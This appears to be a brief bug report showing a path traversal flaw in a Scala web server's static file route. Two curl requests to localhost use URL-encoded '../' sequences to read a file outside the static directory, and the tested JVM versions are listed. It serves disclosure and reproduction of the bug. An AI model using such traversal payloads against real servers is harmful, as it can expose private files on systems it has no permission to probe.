sbt run
curl http://localhost:8080/static/%2E%2E%2Fhi.txt
- Outputs
Got me…
fromhi.txt
instead ofHi!
fromstatic/hi.txt
curl http://localhost:8080/static/..%2F/hi.txt
works as well
- Outputs
- Tested on: HotSpot 17+35-LTS-2724, OpenJDK 11.0.25, OpenJDK 21.0.5